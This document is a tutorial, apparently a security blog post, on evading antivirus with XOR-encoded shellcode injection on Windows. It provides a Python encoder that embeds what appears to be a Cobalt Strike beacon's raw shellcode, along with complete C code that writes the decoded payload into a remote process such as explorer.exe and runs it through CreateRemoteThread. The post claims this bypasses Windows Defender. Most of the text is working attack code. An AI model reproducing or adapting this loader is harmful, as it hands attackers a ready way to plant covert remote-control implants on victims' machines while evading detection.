Introduction

During the previous week, I was doing some research about win32 APIs and how we can use them during weaponizing our attack. Previous work involved process injection, but the goal was to advance further with more sophisticated techniques.

I took a simple vanilla shellcode injection C implementation and enhanced it by implementing a decoding routine. The shellcode would be written to memory in encoded form, then decoded at runtime.

The vanilla process injection technique involves four basic steps:

  • Open the process and retrieve a HANDLE for that process
  • Allocate space on that process
  • Write your shellcode to that process
  • Execute it

Process Injection 101

The technique uses four key Win32 APIs:

  • OpenProcess() - Opens a process and retrieves a handle
  • VirtualAllocEx() - Allocates space in the remote process
  • WriteProcessMemory() - Writes data inside that process
  • CreateRemoteThread() - Executes the shellcode

In normal cases, raw shellcode is written directly to memory. However, if AVs/EDRs detect the shellcode, they raise an alert. The solution: encode the shellcode and save it within the binary, then decode and write it to memory at runtime to avoid detection.

Shellcode Encoding

Shellcode must be encoded in a reversible way to retrieve the original status. Common encoding methods include:

  • XOR
  • ADD
  • Subtract
  • SWAP

This article uses XOR bitwise operation on each opcode. The example uses a Cobalt Strike beacon as shellcode (887 bytes).

Python Encoder Script

#!/usr/bin/python

import sys

raw_data = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x56\x1f\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x35\x6e\x6b\x4f\x00"

new_shellcode = []
for opcode in raw_data:
        new_opcode = (ord(opcode) ^ 0x01)
        new_shellcode.append(new_opcode)

print "".join(["\\x{0}".format(hex(abs(i)).replace("0x", "")) for i in new_shellcode])

The script XORs each byte with 0x01 (the encoding key). The same value is used to decode: XORing twice returns the original value.

hex(ord("\xfc") ^ 0x01) = 0xfd
hex(ord("\xfd") ^ 0x01) = 0xfc

Shellcode Encoder Output

Open Process and Retrieve Handle

The first step requires opening a target process and getting a handle:

#include <windows.h>

int main(int argc, char *argv[]){

  int process_id = atoi(argv[1]);

  HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id);

  if(process){
    printf("[+] Handle retrieved successfully!\n");
    printf("[+] Handle value is %p\n", process);
  }else{
    printf("[-] Enable to retrieve process handle\n");
  }
}

The OpenProcess() function takes three parameters: desired access rights, handle inheritance flag, and process ID. PROCESS_ALL_ACCESS grants full control. Upon success, the handle is stored and printed.

Handle Retrieved Successfully

Allocate Space on Remote Process

After retrieving the handle, space must be allocated in the target process using VirtualAllocEx():

#include <windows.h>

int main(int argc, char *argv[]){

   char data[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

  int process_id = atoi(argv[1]);

  HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id);

  if(process){
    printf("[+] Handle retrieved successfully!\n");
    printf("[+] Handle value is %p\n", process);

    LPVOID base_address;
    base_address = VirtualAllocEx(process, NULL, sizeof(data), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if(base_address){
        printf("[+] Allocated based address is 0x%x\n", base_address);
    }else{
        printf("[-] Unable to allocate memory ...\n");
    }

  }else{
    printf("[-] Unable to retrieve process handle\n");
  }
}

The base_address variable (LPVOID type) stores the allocated memory address. VirtualAllocEx() parameters:

  • process: The handle retrieved via OpenProcess()
  • NULL: Allows automatic address allocation
  • sizeof(data): Size of data to be written
  • **MEM_COMMIT MEM_RESERVE:** Allocation type
  • PAGE_EXECUTE_READWRITE: Read, write, execute permissions

Note: Allocating RWX memory is not stealthy; EDRs may flag this as suspicious.

VirtualAllocEx Output

The allocated address can be verified by attaching a debugger (like x64dbg) to the target process and navigating to the returned address.

Attach x64dbg to Explorer

Go to Address

Enter Address Expression

Allocated Memory Space

Write Data to Memory

This is the critical component. The shellcode is decoded byte-by-byte and written directly to memory:

#include <windows.h>

int main(int argc, char *argv[]){

   unsigned char data[] = "\xfd\x49\x82\xe5\xf1\xe9\xc9\x01\x01\x01...";

  int process_id = atoi(argv[1]);

  HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id);

  if(process){
    printf("[+] Handle retrieved successfully!\n");
    printf("[+] Handle value is %p\n", process);

    LPVOID base_address;
    base_address = VirtualAllocEx(process, NULL, sizeof(data), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if(base_address){

        printf("[+] Allocated based address is 0x%x\n", base_address);

        int i;
        int n = 0;

        for(i = 0; i<=sizeof(data); i++){
            char DecodedOpCode = data[i] ^ 0x01;

            if(WriteProcessMemory(process, base_address+n, &DecodedOpCode, 1, NULL)){
                printf("[+] Byte wrote sucessfully!\n");
                n++;
            }
        }

    }else{
        printf("[-] Unable to allocate memory ...\n");
    }

  }else{
    printf("[-] Unable to retrieve process handle\n");
  }
}

A for loop iterates through each shellcode byte. Each byte is XORed with 0x01 to retrieve the original opcode. WriteProcessMemory() writes each decoded byte to the target memory location.

WriteProcessMemory() parameters:

  • process: Handle from OpenProcess()
  • base_address+n: Target memory address (incremented for each byte)
  • &DecodedOpCode: Pointer to the decoded byte
  • 1: Number of bytes to write
  • NULL: No pointer to receive written byte count

Bytes Written to Memory

The debugger confirms that original bytes are successfully written to the allocated memory region.

Shellcode Written in Debugger

Executing the Shellcode

Finally, the shellcode is executed as a remote thread using CreateRemoteThread():

#include <windows.h>

int main(int argc, char *argv[]){

   unsigned char data[] = "\xfd\x49\x82\xe5\xf1\xe9\xc9\x01\x01\x01...";

  int process_id = atoi(argv[1]);

  HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id);

  if(process){
    printf("[+] Handle retrieved successfully!\n");
    printf("[+] Handle value is %p\n", process);

    LPVOID base_address;
    base_address = VirtualAllocEx(process, NULL, sizeof(data), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if(base_address){

        printf("[+] Allocated based address is 0x%x\n", base_address);

        int i;
        int n = 0;

        for(i = 0; i<=sizeof(data); i++){
            char DecodedOpCode = data[i] ^ 0x01;

            if(WriteProcessMemory(process, base_address+n, &DecodedOpCode, 1, NULL)){
                printf("[+] Byte wrote sucessfully!\n");
                n++;
            }
        }

        CreateRemoteThread(process, NULL, 100,(LPTHREAD_START_ROUTINE)base_address, NULL, 0, 0x5151);

    }else{
        printf("[-] Unable to allocate memory ...\n");
    }

  }else{
    printf("[-] Unable to retrieve process handle\n");
  }
}

CreateRemoteThread() parameters:

  • process: Handle from OpenProcess()
  • NULL: Default security descriptor
  • 100: Initial stack size
  • base_address: First opcode of shellcode
  • NULL: No thread parameters
  • 0: Thread runs immediately
  • 0x5151: Thread ID

Shellcode Written and CreateRemoteThread

Upon execution, an active beacon runs under explorer.exe without triggering Windows Defender.

Active Cobalt Strike Beacon

Conclusion

By encoding our shellcode and decode it using this technique, we were able to bypass AV protection easily and run our shellcode inside another process. The encoder can be customized, but the decoder must be modified accordingly. Code sections are written for educational purposes, and parts can be modified to meet specific execution requirements.